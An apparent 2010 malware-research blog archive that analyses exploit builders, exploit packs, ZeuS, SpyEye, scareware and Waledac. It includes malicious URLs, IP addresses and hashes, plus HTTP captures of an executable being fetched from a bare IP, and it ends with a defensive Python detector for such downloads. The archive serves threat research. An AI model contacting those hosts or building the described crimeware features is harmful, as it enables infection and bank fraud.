MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

28.1.10

Automation in creating exploits II

Vulnerability exploitation is now one of the most widely used infection strategies in the crimeware arena. Although exploiting weaknesses is not a new concept, the fact is that these actions are becoming more and more notorious.

In fact, a large number of vulnerabilities, many of which were patched more than two years ago, continue to be exploited, especially through exploit packs.

However, when these vulnerabilities are 0-Day, the problem is magnified. A case in point is "Operation Aurora", which has recently been bandied about and which exploits a 0-Day vulnerability in Internet Explorer 6. Yes, you read that right... Internet Explorer 6. It is currently being used to spread malware on a massive scale, and not only through version 6, but also on versions 7 and 8.

The vulnerability is identified as CVE-2010-0249, and as happened with the vulnerability exploited by the Conficker worm (MS08-067), whose exploitation was also automated, a builder has recently appeared that automates the creation of the exploit for Internet Explorer in the extremely simple manner that is common in such applications.

This application is Chinese and only lets you configure the web address from which it will try to exploit the weakness in the browser. It then generates a file called IE.html containing the exploit code and the URL used for the attack, which is obfuscated.

As a relevant detail, the generated exploit (embedded in the HTML) is detected by less than 40% of the companies reporting to VirusTotal, while the builder itself is detected by only about 25%.

On the other hand, the automation of exploit creation opens a gap that reveals that many operations "disguised" behind simple attacks, as part of a distraction campaign, are closely related to intelligence matters.

Related Information
Automation in creating exploits
Automation of anti-analysis processes II
Automating anti-analysis processes through crimeware

Jorge Mieres


Zeus and the theft of sensitive information

In light of all the recent financial trojans, here are two examples of what ZeuS bots have modules for. These modules record form data and keystrokes from users logging into Bank of America and PayPal. Both of these screenshots are examples of the capabilities of the newer ZeuS bots out there.

This, together with keylogging, opens the bank vault for these organized groups operating around the world. Here is the gateway that enables them to wire-transfer your money to money-mule networks and back to themselves.



The features shown here, along with the keylogging data that is transmitted back to the C&Cs, open many doors for espionage. These trojans open the floodgates.

To see examples of what they and others have done, see Brian Krebs' blog, which covers, among other things, Remote Access Trojans (RATs) and online bank theft.

Related Information
Leveraging ZeuS to send spam through social networks
ZeuS Botnet and its zombie recruitment power
ZeuS, spam and SSL certificates
Effectiveness of antivirus against ZeuS
Special!!! ZeuS Botnet for Dummies
Botnet. Hardening in the new version of ZeuS
Fusion. A concept adopted by current crimeware
ZeuS Carding World Template. (...) the face of the botnet
Financial institutions targeted by the botnet Zeus. Part two
Financial institutions targeted by the botnet Zeus. Part one
LuckySploit, the right hand of ZeuS
Botnet Zeus. Mass propagation of its Trojan. Part two
Botnet Zeus. Mass propagation of its Trojan. Part one

Ben Koehl
Crimeware Researcher in Malware Intelligence


27.1.10

SpyEye. New bot on the market

SpyEye, a bot whose first release was on January 2 of this year, is a "fresh" piece of malware with interesting features and a considerably fast development pace, being at version 1.0.65 at the moment.

It is written almost entirely in C++, and the binary file is approximately 60 KB in size.
It works from Windows 2000 to Windows 7 and runs in ring 3 (something that possibly makes it detectable by tools like GMER).

Something really interesting here is that, at the date of its first release, the detection rate was basically zero. The price of this bot (base bundle) is USD 500, and some of the features it has at the moment are:
  • Formgrabbing (an advanced keylogging method for capturing web form data), supporting Firefox, IE, Maxthon and Netscape.
  • CC Autofill (a module that, basically, automates the process of credit card fraud and delivers the money to the bot's owner)
  • PHP-MySQL administration panel
  • Daily backup of the database via e-mail
  • Exe string-sources encryption
  • FTP grabbing (Total Commander, Notepad++, FileZilla, and others)
  • POP3 grabbing
  • Invisible in the process list, hidden file, invisible in autorun (registry)
According to the author, the product is very stable and has a permanence rate of 30%.
As we can see, this industry is in a constant process of growth and sophistication, something that, after all, is very alarming.

Related Information
State of the art in Eleonore Exploit Pack
Siberia Exploit Pack. Another package of exploits In-the-Wild
RussKill. Application to perform denial of service attacks
DDoS Botnet. New crimeware particular purpose
JustExploit. New Exploit kit that uses vulnerabili...
Fragus. New botnet framework In-the-Wild
ZeuS Botnet and its zombie recruitment power
Liberty Exploit System. Alternatively crimeware to...

Mariano Miguel
Malware Researcher in Malware Intelligence


25.1.10

Leveraging ZeuS to send spam through social networks

We were able to analyze a pack that turns ZeuS zombies into spammers on social networks. Specifically, the module analyzed was developed for use on Vkontakte.ru, the Russian clone of Facebook.

This crimeware was created by someone calling himself Deex of Freedomscripts Team and is sold for the modest price of USD 100 (via WebMoney).

The pack includes several configuration files, which make it up:

  • config.ini: defines the target (friends or online, although so far only the first option seems to work) and the password of the administrator control panel. When selecting friends, messages are sent to all our contacts who are not online at that time.
  • message.txt: contains the text of the message to send.
  • title.txt: contains the title of the message to send.
  • results.txt: this is where the infected user statistics are kept (vkontakte identifier, IP and number of messages sent).
  • webinjects.txt: HTML code injected into the session of infected PCs that triggers the sending of spam.
The contents of that file must be added to (or completely replace) the file of the same name needed to build the ZeuS binaries, after which the ZeuS configuration file and executable are rebuilt.

Once the victim's PC is infected with this executable, in addition to sending the typical ZeuS reports, it checks the pages visited and, if one belongs to Vkontakte.ru and is in English (it does not work in other languages), activates the code injection in the page, which always maintains the appearance of authenticity.

From that moment on, all requests are processed by the HTML page handled by getconfig.php, which then calls the real page to avoid suspicion, showing the user the actual content as they browse the pages of vkontakte.ru; while underneath, it sends a message every time a link is clicked, via the page js.php, as seen in the following snippet from the log:

The result can be seen in the sent items, where all the messages that were sent to our contacts appear:

All this is managed from a control panel independent of ZeuS, which requires no database to run, since configuration and reporting are kept in separate text files.

The control panel is simple enough. It has a blank login page with a box for the password that gives access to the panel itself, with a menu of 5 options:

  • Reports: shows the result of the spam sending. In our example, the ID has sent 20 messages from the specified IP.

  • Inject: shows the injection code (webinjects.txt) and links to the three pages responsible for the tasks involved in the sending.

  • Settings: from here you can manage the configuration files to change the password and set the title and body of the message to send. This data is stored in the configuration files mentioned above.

  • Help: a brief page with some indication of what this pack is and its two component parts: Inject and Admin.

  • Logout: to exit the control panel.

In short, this package demonstrates how easy it is to take advantage of zombies belonging to a botnet under the control of ZeuS to send messages through social networks.

Although this case concerns, in the first instance, only Vkontakte.ru, adapting it to other social networks or using it for other attacks through web pages, such as click fraud, would be pretty easy.

Related Information

ZeuS Botnet and its zombie recruitment power
ZeuS, spam and SSL certificates
Effectiveness of antivirus against ZeuS
Special!! ZeuS Botnet for Dummies
Botnet. Hardening in the new version of ZeuS
Fusion. A concept adopted by current crimeware
ZeuS Carding World Template. (...) the face of the botnet
Financial institutions targeted by the botnet Zeus II
Financial institutions targeted by the botnet Zeus I
LuckySploit, the right hand of Zeus
ZeuS Botnet. Mass propagation of its Trojan II
ZeuS Botnet. Mass propagation of its Trojan I

Ernesto Martin

Crimeware Researcher in Malware Intelligence


18.1.10

Justifying the unjustifiable in a world criminal

As many readers know, at Malware Intelligence we have been researching the direct implications of this whole new generation of malicious code and the criminal activity that daily feeds the crimeware business.

Under this premise, the researchers focused their efforts on trying to reveal the different branches that are entangled with each other in a web of illegal actions aimed mainly at getting money from users through unethical techniques. And in light of this... are there still doubts that we are facing a big business that profits through illegal activities? (obviously, always according to the laws of each country). I think the unanimous answer is NO.

Having made this assessment, after exposing content about the state of the art of crimeware, including relevant data not yet published so as not to hamper ongoing investigations, it has become common to receive messages and comments, mostly aggressive, from those responsible for the development or commercialization of certain crimeware applications.

Under this scenario, and although I do not usually give explanations about the research we perform, this time I will make an exception and expose two of the last comments we have received from those who are part of the crimeware business.

Especially because in some way they reflect the philosophy (of life and mindset) of those who operate from the underground, although lately things are changing.

The first case is an anonymous, non-aggressive comment that I personally must confess is... very nice :) left by one of the Partners that markets the crimeware YES Exploit System. The comment was made on the article that talks about this exploit pack, where you can also find my answer. The comment is as follows:

YES, We are the blackhats :)
Thanks for small review, but why do ppl think that blackhats are poor guyz?
It's just a business, no less, no more :) Do you wanna buy our excellent product? - there is discounts for you ;)


As my "friends" say, for them it is "just a business, no less, no more." However, let us agree that, besides not being a conventional business, it represents a business model that directly and actively collaborates with criminal activities, which isn't so funny.

Now, YES Exploit System is a crimeware development with a lot of work invested in its code, and whose market value is USD 800. And the one funny thing (as the last sentence of the comment says) is knowing that I will not get any discount on crimeware ;)

The second case I want to present is a bit more aggressive, in response to what was written in the report on the Russian service for testing malware detection, where you can read the comment and my response, which I do not transcribe here because of its length. The message reads:

"In summary, further evidence that not only the exploitation of malware generates profits but also moves parallel money on services to
this industry. And in some cases like the present one, have to see if you can consider this service as a criminal act or not."

Wow and why would this service be criminal act?


It's clear to me that someone has a year work in a software like this scanner and he want to make money with it.
If you don't like it don't use it. No one forces you to pay for it or submit files there but since I see you are a little wanker
blogger who does not respect others work I giving it to you straight.

You have no inside experience in the antivirus industry whatsoever otherwise you would know that VirusTotal distributes 200K files/day
to antivirus companies for FREE. AV companies are shit on online scanners, they wouldn't even contact you if you would ask them about file
distribution and they definitely wouldn't support an online scanner so what else can these services do to remain online?

Before you criticizing others work put something down on the table little frustrated shit..."

Regardless of the aggressive tone of this second comment, what is interesting is where it comes from: someone who uses the word "KLESK" as a nickname and hosts a completely unlawful "attempt at a business", on whose page one of the first things we read is "Selling corporate data, trade secrets".

"We sell corporate data and trade secrets," the propaganda continues. It goes on to clarify what type of information they supposedly "steal" from companies, and tops it off with something very interesting:

"Please losers/asszors stay away, all the data bids start on 5 figures" :: No words... :)

In short, the latter case in particular represents a good opportunity to analyze the psychology of a would-be cyber-criminal whose attempt to "negotiate" not only leaves much to be desired but cannot even be rated as a possibility worth considering as an object of research.

Related Information
Russian service online to check the detection of malware
YES Exploit System. Another crimeware made in Russia

Jorge Mieres


16.1.10

YES Exploit System. Official Business Partner’s

Undoubtedly, the business that crimeware currently represents expands every day. This is reflected not only in the professionalization of the development and operation of the various applications and technologies used to commit crimes and attacks via the web, but also in the sales strategies used to capture the attention of a greater volume of restless minds who make a living stealing money from others on the foundation of a business: a botnet.

While some 90% of crimeware sales still take place in an underground environment where the offer is made directly by the creator of the crimeware, cyber-criminals are taking their business to a "clearer" and "higher" underground level, publicizing their developments through websites designed exclusively to offer their "services", but through "business partners" who handle the logistics.

In early 2009 we mentioned the case of the sale via the web of Unique Sploit Pack, one of the general-purpose exploit packs currently most in demand, whose commercial website was online for a while until it was taken down precisely because it is crimeware.

However, this marketing strategy has resurfaced at the hands of YES Exploit Pack, one of the most active crimeware packages today.

Under the slogan "Improve your business with YES Exploit System. Exploit Pack from Russia", version 2 of this exploit pack is offered for sale through a website registered in Russia.

The propaganda campaign (marketing strategy) on the website consists of briefly explaining the salient features of the crimeware, by way of justifying why it is better than other packages of its style (the competition). It costs USD 800 and the transaction is done, as is typical, via WebMoney.

The crimeware business is expanding its logistics, and this is obviously clear evidence of the evolution of a black market, or not-so-secret market, whose challenges lie not only in seeking technical alternatives that can evade analysis mechanisms.

Related information
YES Exploit System. Otro crimeware made in Rusia
YES Exploit System. Manipulating the attacker's security
Crimeware in 2009
Prices of Russian crimeware. Part 2
Russian trade in private versions of crimeware...
Current outlook of the business generated by crimeware

Jorge Mieres


9.1.10

Napoleon Sploit. Frameware Exploit Pack

This is the first release of an exploit pack for monitoring particular-purpose botnets called Napoleon Sploit, which was launched on the underground crimeware market in August 2009.

Due to its premature state and its low status as a "complex exploit pack" when compared with others of its style, it is low-cost and in fact had no impact on the underground sales circuit, although it is still for sale at a cost of USD 299, with important updates obtainable for USD 35 more.

As we see in the image, its interface is very simple and minimalist. It has only two modules (statistics and configuration) plus the authentication panel (login via web), and according to its author, the light-coloured style of the crimeware is designed not to cause eye fatigue for the cybercriminals, its "future clients".

(No words, but I expect opinions on this.) The following image belongs to the control panel.

The exploit pack is designed to exploit specific vulnerabilities through the following exploits:
  • MDAC - IE5, IE6
  • Opera Telnet - Opera 9.00 - 9.27
  • PDF Util.Printf - Adobe Reader 8.1.2
  • PDF Collab.Geticon / PDF Util.Printf - Adobe Reader & Acrobat > 8.1.2
One detail that I cannot let pass is that this crimeware is the ancestor of Siberia Exploit Pack, another particular-purpose web application developed by the same author as Napoleon Sploit, which is In-The-Wild.

Related information
State of the art in Eleonore Exploit Pack
Siberia Exploit Pack. Another package of exploits I...
RussKill. Application to perform denial of service...
JustExploit. New Exploit kit that uses vulnerabili...
DDoS Botnet. New crimeware particular purpose
ZeuS Botnet and its zombie recruitment power
Phoenix Exploit's Kit. Another alternative for botnet control
iNF`[LOADER]. Botnet control, marijuana and malware propagation
Fragus. New botnet framework In-the-Wild
Liberty Exploit System. Alternatively crimeware to...

Jorge Mieres


A recent tour of scareware XX

Anti-Virus Live 2010 = Anti-Virus Elite 2010, ErrorClean and NoAdware
MD5: c50dc619e13345dec2444b0de371dfd4
IP: 204.232.131.12, 204.232.131.14 - United States, Hoboken, Noadware.net
Domains associated: antivirus-live.com
Result: 9/41 (21.95%)

NoMalware
IP: 88.214.204.221 - United Kingdom, Hosting Solutions Ltd
IP: 72.9.100.114 - United States, New York, Access Integrated Technologies Inc
Domains associated: ontogen.com, nomalwares.org, nomalwarelab.com

Malware Mechanic
MD5: ce48aeb8e8b007b601a7f584d1b7901c
IP: 72.9.100.115 - United States, New York, Access Integrated Technologies Inc
Domains associated: malwaremechanic.com

newsneg.ru, back-shure.ru, year-sneg.ru, yearsneg.ru, night-up.ru, nightup.ru, snegyear.ru, sneg-new.ru, up-day.ru (91.213.29.15) - Russian Federation, Info-media Ltd
world-info2.com (193.104.22.202) - Malta, Kratosweb-net
anyboom.biz (88.214.204.236) - United Kingdom, Hosting Solutions Ltd
sekuritylistsite.com (94.102.63.245) - Netherlands, Amsterdam, The King Host
online-antispym2.com (68.168.212.142) - United States, Secaucus, Honelive
bestsekuritylist.com (193.169.234.3) - Jamaica, Titan-net Ltd
coolsecuritylist.com (212.150.107.40) - Israel, Tel Aviv, Loads

Related information
A recent tour of scareware XIX
A recent tour of scareware XVIII
A recent tour of scareware XVII
A recent tour of scareware XVI
A recent tour of scareware XV
A recent tour of scareware XIV
A recent tour of scareware XIII
A recent tour of scareware XII
A recent tour of scareware X
A recent tour of scareware X
A recent tour of scareware IX
A recent tour of scareware VIII
A recent tour of scareware VII
A recent tour of scareware VI
A recent tour of scareware V
A recent tour of scareware IV
A recent tour of scareware III
A recent tour of scareware II
A recent tour of scareware

Jorge Mieres


5.1.10

Crimeware in 2009

"Crimeware in 2009" presents in a single document everything that was channeled through this blog during that year about crimeware and its associated hazards.

It has a total of 262 pages and is divided by the most relevant topics describing the criminal activities that were a source of news on this blog. It has two indices: one for finding the news easily (table of contents) and another for the images (image index).

Below are some of the themes found in the document in question:
  • Current business outlook caused by crimeware
  • Framework Exploit Pack for botnets general purpose
  • Framework Exploit Pack for botnets particular purpose
  • Services associated with crimeware
  • Intelligence in the fight against crimeware
  • Campaigns of spread and infection
  • Other Exploits packs that were investigated
Short information
Malware Intelligence
Annual compendium of information. Crimeware in 2009
262 pages
Spanish language

Download


Jorge Mieres


4.1.10

State of the art in Eleonore Exploit Pack

Since the launch of its first version in June 2009, Eleonore Exploit Pack has had a major impact in the criminal field, both because of the demand to obtain the exploit pack, due to its competitive cost compared to similar web applications, and because of its high rate of activity.

It currently has a repertoire of 6 (six) versions, the latest being 1.3.2, which recently appeared on the underground scene at a cost of USD 1000.

This means that its author, ExManoize, has updated the package approximately every month, giving a concrete idea of the effort put into its development, which obviously is not out of vocation but is part of the fraudulent business, collaborating in the creation and maintenance of one of the "tools" used in the criminal field.

The structure of this crimeware is quite complex, and it has a repertoire of 13 (thirteen) exploits included in the package by default, which include:
  • MDAC for MSIE
  • MS009-02 for MSIE
  • ActiveX pack. Works in MSIE
  • compareTo for Firefox
  • JNO (JS navigator Object Code) for Firefox
  • MS06-006 for Firefox
  • Font tags for Firefox
  • Telnet for Opera
  • PDF collab.getIcon for all browsers
  • PDF Util.Printf for all browsers
  • PDF collab.collectEmailInfo for all browsers
  • PDF Doc.media.newPlayer for all browsers
  • Java calendar for all browsers
Obviously, like any service offered under a market model, and crimeware is one of them, the "provider" guarantees support, updates and cleanup of the package if necessary. All business!

From a historical standpoint, the Eleonore Exploit Pack updates are:
  • In June 2009 Eleonore Exploit Pack v1.0 goes on sale to the public, containing the exploits MDAC, MS009-02, Snapshot, Telnet (for Opera), PDF collab.getIcon, PDF Util.Printf and PDF collab.collectEmailInfo. Its initial price was USD 599.
  • In July 2009 it is updated to version 1.1 and adds two more exploits: Font tags, which exploits Firefox 3.5, and DirectX DirectShow, which exploits IE 6 and 7. Furthermore, there are improvements in the script encryption. Its price was USD 500, and the previous version dropped in price to USD 300.
  • During the month of July, the Spreadsheet exploit is added, the PDF files are changed, image capture is eliminated and the ability to upload a file through the admin panel itself is added. This version is called 1.2 and its cost is set at USD 700.
  • After a period of three months without updates, in October version 1.3 appears, incorporating more features into the fraudulent package. Among them, some "improvements" to the exploits for Internet Explorer, and Java D&E is added. The cost of this version was USD 1000.
  • In November the marketing of version 1.3.1 begins, which continues to refine the exploits and, among other things, adds a Robots.txt file to improve indexing and prevent certain folders from being displayed. The price remained at USD 1000.
  • During this period, a private beta (1.3B) could be found In-the-Wild.
  • On December 16 the latest version, 1.3.2, appears, adding Java calendar and an exploit for the recent PDF Doc.media.newPlayer vulnerability, which until then was a 0-Day. Its price was unchanged.
From the standpoint of the operator, the infrastructure needed to run the botnet business consists of setting up and putting into operation a dedicated server, which can also be rented. However, the economic benefit can only be obtained through the zombies, because without them the fraudulent activities for which these packages are designed cannot be carried out. In fact, the fairly regular updating of the package demonstrates that the profits obtained through these activities are significant.

Moreover, regardless of the cost of the crimeware, there are "extra services" offered by the developer which are not included in the original package; for example, cleaning of the botnet at a cost of USD 50, and changing the malicious domain for the same price, USD 50.

Alternatively, botmasters (not necessarily the web application developers) often rent out their botnets partially, and in the case of Eleonore Exploit Pack v1.3.2, the rent is USD 40 per day.

Related information
Siberia Exploit Pack. Another package of exploits I...
RussKill. Application to perform denial of service...
JustExploit. New Exploit kit that uses vulnerabili...
DDoS Botnet. New crimeware particular purpose
T-IFRAMER. Kit for the injection of malware In-the...
Fragus. New botnet framework In-the-Wild
Liberty Exploit System. Alternatively crimeware to...
TRiAD Botnet III. Remote administration of multi-p...
Eleonore Exploits Pack. New Crimeware In-the-Wild

Jorge Mieres


3.1.10

Crimeware-as-a-Service and antivirus evasion schemes

The business models offered by cloud computing are not new. Many services currently offered under this banner follow a model that was established in the market long ago.

However, the Cloud Computing concept as we know it today responds to an orientation sharply inclined toward generating business by leveraging the Internet as infrastructure, which in a highly competitive market enjoys certain advantages over conventional business.

Under this scenario, the fact is that this way of creating business was also accepted and implemented by those who profit daily through a battery of programs designed for fraudulent purposes which, when used over the Internet, receive the name Crimeware-as-a-Service, or also its acronym, CaaS.

Fraudulent services are beginning to take shape that seek to automate the handling of malware in processes created solely to evade detection. An example of this is the service (which no longer exists) called PoisonIvy Polymorphic Online Builder, designed to encrypt malware, which we discussed at the time. In this case, since it handles only malicious code, this service would fall under the term Malware-as-a-Service (MaaS).

Similarly, there are currently services developed for profit and intended to feed the crimeware business through mechanisms to verify the degree of effectiveness of malware against antivirus scan engines.

These services are the antonym of others highly used by security professionals, such as VirusTotal from the Spanish company Hispasec. We have also spoken about one of them, called VirTest.

However, there are others, such as Private antivirus service (established in 2008), which like VirTest is of Russian origin and seeks financial gain through a paid service, but also collaborates with the cyber-crime environment by offering the possibility of checking the detection rate of newly created malware at a given moment, while also ensuring that the binary will not be shared with antivirus companies. Thus, anonymity is assured, and with it a longer life cycle for the threat.

The fraudulent service verifies the effectiveness of malware against 17 antivirus engines known on the anti-malware market, and as shown in the first capture, there are three prices depending on the characteristics of the "hired" service:
  • USD 0.2 per check
  • USD 15 for a limited 10 checks per day
  • USD 20 for unlimited checks
Once inside the system, from the AV check tab, binaries are uploaded to be submitted to the antivirus scan, after which the report is provided along with a history of uploads. These options are found in the lower left corner.

An interesting aspect offered by this crimeware service is the ability to schedule verification tasks, through the second tab, called Scheduler.

This option allows, on the one hand, uploading a malicious file from the malware creator's hard drive, and on the other, selecting malware that is already present in the propagation circuit through its URL; that is, the cyber-crooks can verify and monitor the detection of malicious code that is already spreading.

In this way, and through the "scheduler", the check frequency of the uploaded malicious code is scheduled based on a set of parameters chosen according to a set time range of 3, 6 or 12 hours, or 1 or 3 days.

These parameters are configurable and, once set, can be viewed in a table shown in the same window. The third column corresponds to the time range. It also configures how the report notification is delivered, which may be via email or via ICQ.

Clearly, these options are designed with the speed of criminal maneuvering in mind: checking, in the shortest time possible, every 3 hours, whether the threat being propagated is detected by antivirus companies. This allows the malware to be changed whenever necessary, and the service to be combined with others, such as the "service" mentioned above for encrypting files.

Obviously, those who are part of the criminal chain of the crimeware business work together through different alternatives, also forming a side business that feeds on the criminal activities.

Related information
Russian service online to check the detection of malware
Software as a Service on the malware industry
Creating Online PoisonIvy based polymorphic malware

Jorge Mieres


2.1.10

Waledac. Timeline '07-'09

The Waledac trojan, in charge of recruiting zombies for a botnet dedicated to feeding spam, recently made the news again, using the new year 2010 as an excuse.

However, its fraudulent activities date back to 2007, when it was known under the name Storm, and since then this family of malware has taken advantage of social engineering as its main propagation strategy, under different covers.

This timeline extends from the first social engineering activities to the latest and most recently known ones, related to the beginning of 2010.

Related information
Waledac returns with another attack strategy
Waledac/Storm. Past and present a threat
Massive campaign to spread/infection Waledac launched by using as excuse the Independence Day of USA
BlackHat SEO strategy proposed by Waledac
Waledac. Detailed tracking of a latent threat
More Waledac in action. Can you guess how much you master win?
Waledac more loving than ever
Social Engineering and Waledac Valentine

Jorge Mieres


1.1.10

Waledac returns with another attack strategy

After a long period of inactivity, the Waledac botnet is once again deploying an infection strategy using the pattern that characterizes it: social engineering, this time taking advantage of the beginning of the new year as cover.

The latest Waledac campaigns date from the middle of last year, when the propagation strategy used pretended to be a video about Independence Day in the U.S., hosted on YouTube. In fact, the most important activity of the year came during the first quarter.

Here we see captures describing the Waledac timeline of its activity during 2009.

However, those behind Waledac never stopped, and have recently used domains whose registration dates fall throughout the period of supposed inactivity.

Each page used for propagation has an obfuscated script with instructions that are executed automatically on the victim machine. Thus, it exploits a weakness and automatically downloads and executes the malware, turning the computer into a node of the botnet to continue its activities. Below we see a screenshot of the script.

Inside the script is a reference to the file counter.php, which hosts another script and from which it jumps to http://diokxbgrqkgg.com/ld/trest1/ and then to http://diokxbgrqkgg.com/nte/trest1.py, where there is another malicious script.

GET /counter.php HTTP/1.1
Host: aju.nonprobs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://aju.nonprobs.com/2010.html


In this instance, it downloads and runs a file called "ny_foroplay.exe" (MD5: df2d6f835ad6e5276b1b1ffe73170070) from the IP address 95.169.190.208, hosted in Russia.

It's worth noting that this malware has a very low detection rate, being detected to date by only 6 out of 40 antivirus companies. VT report.

GET /pr/pic/ny_foroplay.exe HTTP/1.0
Host: 95.169.190.208

HTTP/1.0 200 OK
Age: 1542
Date: Fri, 01 Jan 2010 19:22:58 GMT
Content-Length: 416256
Content-Type: application/octet-stream
Server: nginx/0.8.15
Last-Modified: Fri, 01 Jan 2010 19:22:58 GMT

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
$.........y.=u..=u..=u...u..u..

Waledac is back with a new excuse, but judging by the percentage of activity on the server where it is hosted, it appears that it always remained dormant, with very sporadic activity. Even taking into account the folder structure from which it is downloaded, it seems to have a direct relationship with another well-known threat, Bredolab, which apparently is also associated with some scareware and ZeuS.
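The two captures above carry the traits a proxy or IDS analyst would key on when hunting this kind of drive-by download: a GET for an .exe from a bare IP address instead of a hostname, a 200 response served as application/octet-stream, and a body that opens with the MZ magic and the "This program cannot be run in DOS mode" stub. The following Python script is an added example written for this page, not code from the original post or from any tool it mentions; it parses a captured request/response pair in the layout shown above and reports which of those indicators fire. The Waledac sample reuses the headers printed in the post, but its body bytes are constructed (a minimal MZ header followed by the DOS stub), since the post only shows a partially printable dump; the benign PNG sample, the 128-byte body prefix and the threshold of three indicators are assumptions of the example.

```python
import re
from dataclasses import dataclass

# Indicators drawn from the capture in the post: a GET for an .exe from a
# bare-IP host, served as application/octet-stream, whose body starts with the
# MZ magic and carries the DOS stub text.
MZ_MAGIC = b"MZ"
DOS_STUB = b"This program cannot be run in DOS mode"
IPV4_LITERAL = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
EXECUTABLE_EXTENSIONS = (".exe", ".scr", ".dll", ".pif", ".com")


@dataclass
class HttpTransaction:
    method: str
    path: str
    req_headers: dict   # lower-cased header names -> values
    status: int
    resp_headers: dict  # lower-cased header names -> values
    body_prefix: bytes  # first 128 bytes of the response body (assumed window)


def _parse_headers(lines):
    """Turn 'Name: value' lines into a dict with lower-cased names."""
    headers = {}
    for line in lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def parse_transaction(raw: bytes) -> HttpTransaction:
    """Parse one captured request/response pair laid out as in the post:
    request head, blank line, response head, blank line, response body."""
    req_head, _, rest = raw.partition(b"\r\n\r\n")
    resp_head, _, body = rest.partition(b"\r\n\r\n")
    req_lines = req_head.decode("latin-1").split("\r\n")
    method, path, _version = req_lines[0].split(" ", 2)
    resp_lines = resp_head.decode("latin-1").split("\r\n")
    status = int(resp_lines[0].split(" ")[1])
    return HttpTransaction(
        method=method,
        path=path,
        req_headers=_parse_headers(req_lines[1:]),
        status=status,
        resp_headers=_parse_headers(resp_lines[1:]),
        body_prefix=body[:128],
    )


def executable_download_indicators(tx: HttpTransaction) -> list:
    """Return the indicators that make this transaction look like a drive-by
    executable download. An empty list means nothing matched."""
    hits = []
    if IPV4_LITERAL.match(tx.req_headers.get("host", "")):
        hits.append("host-is-ip-literal")
    if tx.path.lower().endswith(EXECUTABLE_EXTENSIONS):
        hits.append("executable-extension")
    if tx.resp_headers.get("content-type", "").lower().startswith("application/octet-stream"):
        hits.append("octet-stream-response")
    if tx.status == 200 and tx.body_prefix.startswith(MZ_MAGIC):
        hits.append("mz-header")
    if DOS_STUB in tx.body_prefix:
        hits.append("dos-stub")
    return hits


def is_suspicious_download(raw: bytes, threshold: int = 3) -> bool:
    """Flag a capture when at least `threshold` indicators fire together;
    the threshold is a tuning assumption of this example, not a value from the post."""
    return len(executable_download_indicators(parse_transaction(raw))) >= threshold


# Sample capture: request and response headers follow the ones shown in the
# post; the body is constructed (MZ header, 76 bytes of padding, DOS stub at
# offset 0x4E), since the post only shows a partially printable dump.
WALEDAC_SAMPLE = (
    b"GET /pr/pic/ny_foroplay.exe HTTP/1.0\r\n"
    b"Host: 95.169.190.208\r\n"
    b"\r\n"
    b"HTTP/1.0 200 OK\r\n"
    b"Age: 1542\r\n"
    b"Date: Fri, 01 Jan 2010 19:22:58 GMT\r\n"
    b"Content-Length: 416256\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Server: nginx/0.8.15\r\n"
    b"Last-Modified: Fri, 01 Jan 2010 19:22:58 GMT\r\n"
    b"\r\n"
    + MZ_MAGIC + b"\x90\x00" * 38 + DOS_STUB + b".\r\n$"
)

# Constructed benign contrast: an image fetched from a named host.
BENIGN_SAMPLE = (
    b"GET /images/logo.png HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"\r\n"
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: image/png\r\n"
    b"Content-Length: 1234\r\n"
    b"\r\n"
    b"\x89PNG\r\n\x1a\n"
)

if __name__ == "__main__":
    for name, sample in (("waledac", WALEDAC_SAMPLE), ("benign", BENIGN_SAMPLE)):
        tx = parse_transaction(sample)
        print(name, tx.req_headers.get("host"), tx.path, executable_download_indicators(tx))
```

Any single indicator is weak on its own (plenty of legitimate software is served as application/octet-stream), which is why the script lists every indicator that fired and only calls a capture suspicious when several coincide; in the Waledac capture all five do, which is the combination worth alerting on.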

Related information
Waledac/Storm. Past and present a threat
Massive campaign to spread/infection Waledac launched by using as excuse the Independence Day of USA
BlackHat SEO strategy proposed by Waledac
Waledac. Detailed tracking of a latent threat
More Waledac in action. Can you guess how much you master win?
Waledac more loving than ever
Social Engineering and Waledac Valentine

Jorge Mieres
